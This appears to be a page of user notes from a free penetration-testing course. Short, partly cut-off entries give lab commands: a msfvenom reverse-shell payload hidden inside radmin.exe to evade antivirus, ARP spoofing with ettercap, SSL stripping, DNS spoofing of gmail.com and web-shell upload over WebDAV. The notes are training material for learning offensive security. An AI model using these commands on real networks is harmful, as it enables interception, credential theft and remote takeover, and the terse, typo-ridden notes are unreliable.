Advanced Penetration Testing Notes

permissions, packages

chmod 0 – none 1 – execute 2 – write 3 – read, execute 4 – read 5 – read, execute 6 – read, write 7 – read, write, execute [view]

By: 1ch1 | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: September 24, 2016

linux

adduser georgia sudo [view]

By: 1ch1 | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: September 24, 2016

[pst ex[;plit 3

setting up a proxy in metasploit and proxychains [view]

By: Ianprice777 | Related Lesson: Post Exploitation (part 3) Pivoting | Modified: September 22, 2016

post explouit 2

check metasploit tree for post exploitation modules [view]

By: Ianprice777 | Related Lesson: Post Exploitation (part 2) Exploit Development | Modified: September 22, 2016

Post exploitation 1

post exploitation meterpreter scripts getgui -e   ??/   metastploit post exploitation modules get user privilage scalation xp windows 7 and ubuntu   [view]

By: Ianprice777 | Related Lesson: Post Exploitation (part 1) File Transfer without and Interactive Shell | Modified: September 22, 2016

advance exploitation

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.77 LPORT=1234 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe -x embed inside of the executable -k run the payload on a diferent thread set it on web server and it was ca [view]

By: Ianprice777 | Related Lesson: Advanced Exploitation (part 5) Bypassing Antivirus Software | Modified: September 22, 2016

exploitation

cadaver http://192.168.1.76/webdav enter credentials and gain access make a file and ’put test.txt’ after logged in simple web shells located in /usr/share/webshells/   [view]

By: ralleshouse | Related Lesson: Exploitation (part 1) Direct Exploitation | Modified: September 21, 2016

ssl strip

start the arpspoof set up iptables iptables -t nat -A PREROUTING  -p tcp –destination-port 80 -j REDIRECT –to-port 8080 sslstrip -l 8080 [view]

By: ralleshouse | Related Lesson: Traffic Capture (part 6) SSL Stripping | Modified: September 21, 2016

ettercap

arpspoof  arpspoof -i eth0 -t 192.168.1.80 192.168.1.1 arpspoof -i eth0 -t 192.168.1.1  192.168.1.80 nano /proc/sys/net/ipv4/ip_forward set to 1 instead of 0 get wireshark running ettercap -Ti eth0 -M arp:remote /192.168.1.1/ /192.168.1.80 make s [view]

By: ralleshouse | Related Lesson: Traffic Capture (part 5) ettercap | Modified: September 21, 2016

DNS cache poisioning

dnsspoof -i eth0 -f hosts.txt arpspoof -i eth0 -t 192.168.1.80 192.168.1.1 and arpspoof -i eth0 -t 12.168.1.1 192.168.1.80 tlling both machines that I am the gateway create a file calle host.txt 127.0.0.1 www.gmail.com service apache2 start dnssp [view]

By: ralleshouse | Related Lesson: Traffic Capture (part 4) DNS | Modified: September 21, 2016

« First ‹ Previous 1 109 199 207 208 209 210 211 219 243 Next › Last »

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel